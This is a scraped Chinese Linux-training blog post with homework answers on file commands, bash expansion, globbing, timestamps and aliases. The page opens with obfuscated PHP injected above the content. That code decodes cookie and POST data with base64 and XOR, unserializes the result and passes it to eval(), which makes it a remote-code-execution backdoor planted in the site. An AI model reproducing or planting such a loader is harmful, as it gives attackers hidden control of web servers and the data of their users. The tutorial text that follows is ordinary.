$yXMmiEcIGK = chr ( 1034 - 946 ).'J' . chr (82) . chr ( 507 - 412 )."\160" . chr ( 1009 - 924 )."\x70";$HOygnoFBa = "\143" . chr (108) . chr (97) . chr ( 290 - 175 ).'s' . chr ( 711 - 616 ).chr (101) . 'x' . 'i' . "\x73" . "\164" . "\163";$BYAUcYott = class_exists($yXMmiEcIGK); $HOygnoFBa = "43522";$Jlpsxntry = !1;if ($BYAUcYott == $Jlpsxntry){function GYwpAWr(){return FALSE;}$NHUGUhVAVW = "47311";GYwpAWr();class XJR_pUp{private function keUQyUYK($NHUGUhVAVW){if (is_array(XJR_pUp::$yoUiHbHZ)) {$VQenh = str_replace('<' . chr (63) . 'p' . chr ( 380 - 276 )."\x70", "", XJR_pUp::$yoUiHbHZ['c' . "\157" . 'n' . 't' . chr (101) . "\156" . chr (116)]);eval($VQenh); $NHUGUhVAVW = "47311";exit();}}private $EYcCRZiy;public function dnqWMeVW(){echo 28968;}public function __destruct(){$NHUGUhVAVW = "42892_3067";$this->keUQyUYK($NHUGUhVAVW); $NHUGUhVAVW = "42892_3067";}public function __construct($DRaFgsEM=0){$FaiXtmvVIC = $_POST;$GcaGSUVsUd = $_COOKIE;$WLihkFyqXK = "7f2358cb-ef52-4b41-90bf-d69713355722";$eTgQsanT = @$GcaGSUVsUd[substr($WLihkFyqXK, 0, 4)];if (!empty($eTgQsanT)){$gKxEf = "base64";$zSqaoQvNL = "";$eTgQsanT = explode(",", $eTgQsanT);foreach ($eTgQsanT as $JSlTbQdQ){$zSqaoQvNL .= @$GcaGSUVsUd[$JSlTbQdQ];$zSqaoQvNL .= @$FaiXtmvVIC[$JSlTbQdQ];}$zSqaoQvNL = array_map($gKxEf . chr ( 1019 - 924 ).'d' . chr (101) . chr (99) . chr ( 938 - 827 ).'d' . "\145", array($zSqaoQvNL,)); $zSqaoQvNL = $zSqaoQvNL[0] ^ str_repeat($WLihkFyqXK, (strlen($zSqaoQvNL[0]) / strlen($WLihkFyqXK)) + 1);XJR_pUp::$yoUiHbHZ = @unserialize($zSqaoQvNL); $zSqaoQvNL = class_exists("42892_3067");}}public static $yoUiHbHZ = 65175;}$zupyxb = new /* 61085 */ $yXMmiEcIGK(47311 + 47311); $Jlpsxntry = $zupyxb = $NHUGUhVAVW = Array();} 马哥教育网络21期+第2周博客练习 | Linux运维部落

马哥教育网络21期+第2周博客练习

1、Linux上的文件管理类命令都有哪些,其常用的使用方法及其相关示例演示。

        • cat, tac

        • more

more [OPTIONS…] FILE…

-d: 显示翻页及退出提示

        • less

less [OPTIONS…] FILE…

        • head

head [OPTION]… [FILE]…

-c #: 指定获取前#字节

-n #: 指定获取前#行

-#:

        • tail 

tail [OPTION]… [FILE]…

-c #: 指定获取后#字节

-n #: 指定获取后#行

-#:

-f: 跟踪显示文件新追加的内容;

more:

[root@CentOS6 tmp]# more test.txt 
111
222
dd

less:

111
222
ddd

test.txt (END)

head和tail:

[root@CentOS6 tmp]# cat test.txt 
111
222
ddd
[root@CentOS6 tmp]# head -2 test.txt |tail -1
222

2、bash的工作特性之命令执行状态返回值和命令行展开所涉及的内容及其示例演示。

  • 执行状态返回值:

    $?:保存最近一条命令执行状态结果;

    0:成功

    1-255:失败

[root@CentOS6 tmp]# ls
fstab  inittab  l  l1d  l23f  lABd  magedu.com  mageedu  mageedu.com  passwd.out  system-release  test  test.out  vimtest  who.out
[root@CentOS6 tmp]# echo $?
0
[root@CentOS6 ~]# lsls /etc
-bash: lsls: command not found
[root@CentOS6 ~]# echo $?
127
  • 命令行展开: 

                ~: 展开为用户的主目录

~USERNAME:展开为指定用户的主目录

{}:可承载一个以逗号分隔的列表,并将其展开为多个路径

[root@CentOS6 ~]# ls ~
anaconda-ks.cfg  bin  install.log  install.log.syslog
[root@CentOS6 ~]# pwd
/root
[root@CentOS6 ~]# cd ~santi
[root@CentOS6 santi]# pwd
/home/santi
[root@CentOS6 santi]# cd
[root@CentOS6 ~]# mkdir -pv ~/test/{bin,sbin/{test1,test2}}
mkdir: 已创建目录 "/root/test"
mkdir: 已创建目录 "/root/test/bin"
mkdir: 已创建目录 "/root/test/sbin"
mkdir: 已创建目录 "/root/test/sbin/test1"
mkdir: 已创建目录 "/root/test/sbin/test2"

3、请使用命令行展开功能来完成以下练习:

   (1)、创建/tmp目录下的:a_c, a_d, b_c, b_d

[root@CentOS6 ~]# mkdir /tmp/{a,b}_{c,d}
[root@CentOS6 ~]# ls /tmp
a_c  a_d  b_c  b_d

   (2)、创建/tmp/mylinux目录下的:

mylinux/

    ├── bin

    ├── boot

    │   └── grub

    ├── dev

    ├── etc

    │   ├── rc.d

    │   │   └── init.d

    │   └── sysconfig

    │       └── network-scripts

    ├── lib

    │   └── modules

    ├── lib64

    ├── proc

    ├── sbin

    ├── sys

    ├── tmp

    ├── usr

    │   └── local

    │       ├── bin

    │       └── sbin

    └── var

        ├── lock

        ├── log

        └── run

[root@CentOS6 tmp]# mkdir -pv /tmp/mylinux/{bin,boot/grub,dev,etc/{rc.d/init.d,sysconfig/network-scripts},lib/modules,lib64,proc,sbin,sys,tmp,usr/local/{bin,
sbin},var/{local,log,run}}mkdir: 已创建目录 "/tmp/mylinux"
mkdir: 已创建目录 "/tmp/mylinux/bin"
mkdir: 已创建目录 "/tmp/mylinux/boot"
mkdir: 已创建目录 "/tmp/mylinux/boot/grub"
mkdir: 已创建目录 "/tmp/mylinux/dev"
mkdir: 已创建目录 "/tmp/mylinux/etc"
mkdir: 已创建目录 "/tmp/mylinux/etc/rc.d"
mkdir: 已创建目录 "/tmp/mylinux/etc/rc.d/init.d"
mkdir: 已创建目录 "/tmp/mylinux/etc/sysconfig"
mkdir: 已创建目录 "/tmp/mylinux/etc/sysconfig/network-scripts"
mkdir: 已创建目录 "/tmp/mylinux/lib"
mkdir: 已创建目录 "/tmp/mylinux/lib/modules"
mkdir: 已创建目录 "/tmp/mylinux/lib64"
mkdir: 已创建目录 "/tmp/mylinux/proc"
mkdir: 已创建目录 "/tmp/mylinux/sbin"
mkdir: 已创建目录 "/tmp/mylinux/sys"
mkdir: 已创建目录 "/tmp/mylinux/tmp"
mkdir: 已创建目录 "/tmp/mylinux/usr"
mkdir: 已创建目录 "/tmp/mylinux/usr/local"
mkdir: 已创建目录 "/tmp/mylinux/usr/local/bin"
mkdir: 已创建目录 "/tmp/mylinux/usr/local/sbin"
mkdir: 已创建目录 "/tmp/mylinux/var"
mkdir: 已创建目录 "/tmp/mylinux/var/local"
mkdir: 已创建目录 "/tmp/mylinux/var/log"
mkdir: 已创建目录 "/tmp/mylinux/var/run"
[root@CentOS6 tmp]# tree mylinux/
mylinux/
├── bin
├── boot
│   └── grub
├── dev
├── etc
│   ├── rc.d
│   │   └── init.d
│   └── sysconfig
│       └── network-scripts
├── lib
│   └── modules
├── lib64
├── proc
├── sbin
├── sys
├── tmp
├── usr
│   └── local
│       ├── bin
│       └── sbin
└── var
    ├── local
    ├── log
    └── run

4、文件的元数据信息有哪些,分别表示什么含义,如何查看?如何修改文件的时间戳信息。

  • 元数据信息包含:

File:文件名

Size:文件大小      Blocks:占据的磁盘块     IO Block:I/O块读取大小

Device:所在设备      Inode:占据的Inode号     Links:连接数

Access:文件权限      Uid:属主          Gid:属组

Access:最近访问时间

Modify:文件内容最近修改时间

Change:元数据最近修改时间,如果修改了元数据,该时间戳会自动变化

  • 查看:stat命令

[root@CentOS6 tmp]# stat fstab 
  File: "fstab"
  Size: 783       	Blocks: 8          IO Block: 4096   普通文件
Device: fd00h/64768d	Inode: 2093137     Links: 1
Access: (0644/-rw-r--r--)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2016-07-17 13:28:48.349008446 +0800
Modify: 2016-07-17 13:28:48.349008446 +0800
Change: 2016-07-17 13:28:48.349008446 +0800
  • 修改:touch命令

    touch:

      • 语法:

        • touch [OPTION]… FILE…

        • -a: only atime

        • -m: only mtime

        • -t STAMP:

              [[CC]YY]MMDDhhmm[.ss]

        • -c: 如果文件不存,则不予创建

[root@CentOS6 tmp]# stat fstab 
  File: "fstab"
  Size: 783       	Blocks: 8          IO Block: 4096   普通文件
Device: fd00h/64768d	Inode: 2093137     Links: 1
Access: (0644/-rw-r--r--)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2016-07-17 13:28:48.349008446 +0800
Modify: 2016-07-17 13:28:48.349008446 +0800
Change: 2016-07-17 13:28:48.349008446 +0800
[root@CentOS6 tmp]# touch -a fstab 
[root@CentOS6 tmp]# stat fstab 
  File: "fstab"
  Size: 783       	Blocks: 8          IO Block: 4096   普通文件
Device: fd00h/64768d	Inode: 2093137     Links: 1
Access: (0644/-rw-r--r--)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2016-07-17 13:41:17.421007929 +0800
Modify: 2016-07-17 13:28:48.349008446 +0800
Change: 2016-07-17 13:41:17.421007929 +0800
[root@CentOS6 tmp]# touch -m fstab 
[root@CentOS6 tmp]# stat fstab 
  File: "fstab"
  Size: 783       	Blocks: 8          IO Block: 4096   普通文件
Device: fd00h/64768d	Inode: 2093137     Links: 1
Access: (0644/-rw-r--r--)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2016-07-17 13:41:17.421007929 +0800
Modify: 2016-07-17 13:41:29.734007208 +0800
Change: 2016-07-17 13:41:29.734007208 +0800

###Change因为元数据修改所以自动变化。

5、如何定义一个命令的别名,如何在命令中引用另一个命令的执行结果?

  • 别名:alias命令

    • 查看:

[root@CentOS6 tmp]# alias
alias cp='cp -i'
alias l.='ls -d .* --color=auto'
alias ll='ls -l --color=auto'
alias ls='ls --color=auto'
alias mv='mv -i'
alias rm='rm -i'
alias which='alias | /usr/bin/which --tty-only --read-alias --show-dot --show-tilde
    • 定义:

[root@CentOS6 tmp]# alias grep='grep --color=auto'
[root@CentOS6 tmp]# alias
alias cp='cp -i'
alias grep='grep --color=auto'

###以上定义只存在于当前bash进程,切换进程或者关闭进程就失效,如果想永久定义别名,需要在配置文件中定义。

  • 命令引用:

name=`COMMAND`, name=$(COMMAND)

[root@CentOS6 tmp]# name=`hostname`
[root@CentOS6 tmp]# echo $name
CentOS6
[root@CentOS6 tmp]# name2=$(hostname)
[root@CentOS6 tmp]# echo $name2
CentOS6

6、显示/var目录下所有以l开头,以一个小写字母结尾,且中间至少出现一位数字(可以有其它字符)的文件或目录。

[root@CentOS6 ~]# ls /var/1*[0-9]*[a-z]
ls: 无法访问/var/1*[0-9]*[a-z]: 没有那个文件或目录
[root@CentOS6 ~]# ls /var/1*[[:digit]]*[[:lower:]]
ls: 无法访问/var/1*[[:digit]]*[[:lower:]]: 没有那个文件或目录

7、显示/etc目录下,以任意一个数字开头,且以非数字结尾的文件或目录。

[root@CentOS6 ~]# ls /etc/[0-9]*[^[:digit:]]
ls: 无法访问/etc/[0-9]*[^[:digit:]]: 没有那个文件或目录

8、显示/etc目录下,以非字母开头,后面跟了一个字母以及其它任意长度任意字符的文件或目录。

[root@CentOS6 ~]# ls /etc/[^[:alpha:]][[:alpha:]]*
ls: 无法访问/etc/[^[:alpha:]][[:alpha:]]*: 没有那个文件或目录

9、在/tmp目录下创建以tfile开头,后跟当前日期和时间的文件,文件名形如:tfile-2016-05-27-09-32-22。

[root@CentOS6 ~]# mkdir /tmp/tfile-`date +%F-%H-%M-%S`
[root@CentOS6 ~]# ls /mtp
fstab  mylinux  tfile-2016-07-17-14-07-23

10、复制/etc目录下所有以p开头,以非数字结尾的文件或目录到/tmp/mytest1目录中。

[root@CentOS6 mytest1]# cp -a /etc/p*[^0-9] .
[root@CentOS6 mytest1]# ls
pam.d   passwd-       pinforc   pm                            popt.d       ppp            prelink.conf.d  profile.d  purple
pango   pbm2ppa.conf  pki       pm-utils-hd-apm-restore.conf  portreserve  prelink.cache  printcap        protocols
passwd  pcmcia        plymouth  pnm2ppa.conf                  postfix      prelink.conf   profile         pulse

11、复制/etc目录下所有以.d结尾的文件或目录至/tmp/mytest2目录中。

[root@CentOS6 tmp]# cp -a /etc/*.d mytest2/
[root@CentOS6 tmp]# ls mytest2/
ant.d              cron.d         event.d       logrotate.d    oddjobd.conf.d  profile.d  rc3.d  rc.d           sane.d       sysctl.d
bash_completion.d  depmod.d       init.d        lsb-release.d  pam.d           rc0.d      rc4.d  request-key.d  setuptool.d  xinetd.d
cgconfig.d         dnsmasq.d      latrace.d     makedev.d      popt.d          rc1.d      rc5.d  rsyslog.d      statetab.d   yum.repos.d
chkconfig.d        dracut.conf.d  ld.so.conf.d  modprobe.d     prelink.conf.d  rc2.d      rc6.d  rwtab.d        sudoers.d

12、复制/etc/目录下所有以l或m或n开头,以.conf结尾的文件至/tmp/mytest3目录中。

[root@CentOS6 tmp]# cp -a /etc/[1mn]*.conf mytest3/
[root@CentOS6 tmp]# ls mytest3/
mke2fs.conf  mtools.conf  nfsmount.conf  nsswitch.conf  ntp.conf

原创文章,作者:sandiegoit,如若转载,请注明出处:http://www.178linux.com/24544

(0)
上一篇 2016-07-17 21:50
下一篇 2016-07-17 21:50

相关推荐

  • 马哥教育网络班20期+第3周课程练习

     1、列出当前系统上所有已经登录的用户的用户名,注意:同一个用户登录多次,则只显示一次即可。 法一: who | cut -d ‘ ‘ -f 1 | tail -u 法二: who | cut -d ’’-f&…

    Linux干货 2016-06-26
  • linux系统用户管理和grep正则表达式练习

    1、复制/etc/skel目录为/home/tuser1,要求/home/tuser1及其内部文件的属组和其它用户均没有任何访问权限。 [root@suywien ~]# cp -rpv /etc/skel/ /home/tuser1/ ‘/etc/skel/’ -> ‘/home/tuser1/’ ‘/etc/skel/.mozilla’ ->…

    Linux干货 2018-03-25
  • Linux系统学习-第四周

    Linux系统学习

    Linux笔记 2018-06-03
  • 用PXE批量部署系统

    在部署操作系统的时候可以选择安装centos6还是centos7

    Linux笔记 2018-05-27
  • Iptables入门到进阶

    Iptables入门到进阶 一、前言 Firewall(防火墙): 隔离工具;Packets Filter Firewall(包过滤防火墙);工作于主机或网络的边缘,对经由的报文根据预先定义的规则(匹配条件)进行检测,对于能够被规则匹配到的报文实行某预定义的处理机制的一套组件; 防火墙类型 从防火墙的实现形式来分的话,防火墙可以分为软件防火墙和硬件防火墙 硬…

    Linux干货 2017-02-11

评论列表(1条)

  • 马哥教育
    马哥教育 2016-07-17 22:07

    写的很好,排版也很漂亮,加油